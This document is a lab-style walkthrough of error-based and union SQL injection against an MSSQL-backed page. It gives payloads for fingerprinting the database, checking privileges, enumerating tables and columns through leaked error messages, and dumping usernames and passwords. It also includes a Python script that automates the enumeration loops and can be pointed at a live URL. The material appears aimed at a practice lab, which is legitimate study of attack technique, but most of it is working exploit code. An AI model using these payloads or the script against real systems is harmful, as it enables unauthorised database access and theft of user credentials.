Step 1: On Level 1, append a single quote to the id parameter to test for injection. The error echoed back by the page shows the parameter is handled as a string (the quote breaks out of the quoted literal); appending a comment closes the rest of the query and the page renders normally again.
?id=1'
?id=1' --+
Step 2: The following payload tests whether the backend is MSSQL: sysobjects is a SQL Server system table, so if the page still renders normally the backend is MSSQL (on MySQL the same query errors out). The database can also be identified from the text of the error messages the page leaks.
' and exists(select * from sysobjects)--+
Step 3: Query database information. If user returns dbo, the login maps to the database owner, i.e. elevated privileges (typically the sa/sysadmin login); if it returns an ordinary user name, the login has normal privileges. Note that is_srvrolemember('public') returns 1 for every valid login; replacing 'public' with 'sysadmin' tells you whether the login actually belongs to the sysadmin server role.
user: current user
db_name(): current database name
@@version: version information
' union select 1,user,is_srvrolemember('public'); --+
' union select 1,@@version,is_srvrolemember('public'); --+
Step 4: Use the following statements to guess which tables exist and so obtain the target site's table information. The trick is the integer comparison: xtype='U' selects user tables, and comparing a table name (a string) against 1 forces a type conversion that fails, so MSSQL leaks the name inside its "Conversion failed when converting the nvarchar value '...' to data type int" error. The first form reads tables by position (top 2 ... order by id desc returns the second table); the simpler forms exclude every name already found so that top 1 yields the next one.
-1' and (select top 1 cast(name as varchar(256)) from (select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id) t order by id desc)=1 --+
-1' and 1=(select top 1 name from sysobjects where xtype='U' and name!='users') --+
-1' and 1=(select top 1 name from sysobjects where xtype='U' and name!='users' and name!='emails') --+
-1' and 1=(select top 1 name from sysobjects where xtype='U' and name!='users' and name!='emails' and name!='uagents') --+
-1' and 1=(select top 1 name from sysobjects where xtype='U' and name!='users' and name!='emails' and name!='uagents' and name!='referers') --+
When the page comes back without a conversion error, the subquery returned no row, which means there are no more user tables.
Step 5: Use the following statements to dump every column of the table. A HAVING clause without GROUP BY makes MSSQL complain that the first selected column "is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause", naming it as table.column; adding that column to GROUP BY makes the error name the next column, and once the page renders normally every column has been listed.
' having 1=1 --+
' group by id having 1=1--+
' group by id,username having 1=1--+
' group by id,username,password having 1=1--+
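Steps 4 and 5 are loops: send a payload, pull the leaked name out of the MSSQL error text, add it to the exclusion list (or the GROUP BY list), repeat until the page stops erroring. The script below automates both loops. It is an added example, not code from the original write-up; the error-message patterns are the real SQL Server messages quoted above, while the target (a GET parameter named id in a single-quoted string context, as on Level 1) and the canned responder used to run it offline are assumptions.

```python
import re
from typing import Callable, List

# Real MSSQL error texts leaked by the two techniques. The conversion error carries the
# table name; the GROUP BY error carries table.column.
CONVERSION_ERR = re.compile(
    r"Conversion failed when converting the n?varchar value '([^']*)' to data type int", re.I)
GROUPBY_ERR = re.compile(
    r"Column '(\w+)\.(\w+)' is invalid in the select list", re.I)


def build_table_payload(known: List[str]) -> str:
    """Step 4 payload: exclude every table already found so `top 1` yields the next one."""
    exclusions = "".join(f" and name!='{t}'" for t in known)
    return f"-1' and 1=(select top 1 name from sysobjects where xtype='U'{exclusions}) --+"


def build_column_payload(known: List[str]) -> str:
    """Step 5 payload: a bare HAVING, then HAVING with every known column in GROUP BY."""
    if not known:
        return "' having 1=1 --+"
    return "' group by " + ",".join(known) + " having 1=1 --+"


def enumerate_tables(send: Callable[[str], str], limit: int = 50) -> List[str]:
    """Walk the user tables until the page returns without a conversion error."""
    found: List[str] = []
    while len(found) < limit:
        m = CONVERSION_ERR.search(send(build_table_payload(found)))
        if not m:
            break  # no error: subquery returned no row, list exhausted
        found.append(m.group(1))
    return found


def enumerate_columns(send: Callable[[str], str], limit: int = 50) -> List[str]:
    """Walk the columns of the queried table until GROUP BY covers all of them."""
    found: List[str] = []
    while len(found) < limit:
        m = GROUPBY_ERR.search(send(build_column_payload(found)))
        if not m:
            break  # no error: every column is now in GROUP BY
        found.append(m.group(2))
    return found


def http_sender(base_url: str) -> Callable[[str], str]:
    """Transport for a live target (assumed URL shape: http://host/Less-1/?id=).
    Error pages may come back as HTTP 500, so the body is read in either case."""
    from urllib.error import HTTPError
    from urllib.parse import urlencode
    from urllib.request import urlopen

    def send(payload: str) -> str:
        try:
            return urlopen(base_url + "?" + urlencode({"id": payload})).read().decode(errors="replace")
        except HTTPError as e:
            return e.read().decode(errors="replace")
    return send


def make_fake_target(tables: List[str], columns: List[str]) -> Callable[[str], str]:
    """Constructed stand-in for the vulnerable page so the loops can run offline.
    It answers the payloads above the way MSSQL would, using the same error texts."""
    def send(payload: str) -> str:
        if "xtype='U'" in payload:
            excluded = re.findall(r"name!='([^']*)'", payload)
            left = [t for t in tables if t not in excluded]
            if left:
                return f"Conversion failed when converting the nvarchar value '{left[0]}' to data type int."
        elif "having 1=1" in payload:
            grouped = re.findall(r"group by ([\w, ]+) having", payload)
            known = [c.strip() for c in grouped[0].split(",")] if grouped else []
            left = [c for c in columns if c not in known]
            if left:
                return (f"Column 'users.{left[0]}' is invalid in the select list because it is "
                        "not contained in either an aggregate function or the GROUP BY clause.")
        return "<html>normal page</html>"
    return send


if __name__ == "__main__":
    # Constructed sample target with the same tables and columns the write-up finds.
    send = make_fake_target(["users", "emails", "uagents", "referers"], ["id", "username", "password"])
    print("tables:", enumerate_tables(send))
    print("columns:", enumerate_columns(send))
```

Against a real target swap make_fake_target for http_sender("http://host/Less-1/"); the payload builders quote nothing, so a table name containing a single quote would need escaping before being fed back into the exclusion list.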
Step 6: Dump the column values.
1. Find the number of columns in the query
' order by 3 --+
renders normally
' order by 4 --+
errors, so the query selects 3 columns
2. Find which columns are echoed to the page
-1' union select 1,2,3 from users--+
3. Read the column contents through the echoed positions
-1' union all select 1,(select top 1 username from users),'3'--+
-1' union all select 1,2,(select top 1 password from users)--+
1' union select 1,username,password from users--+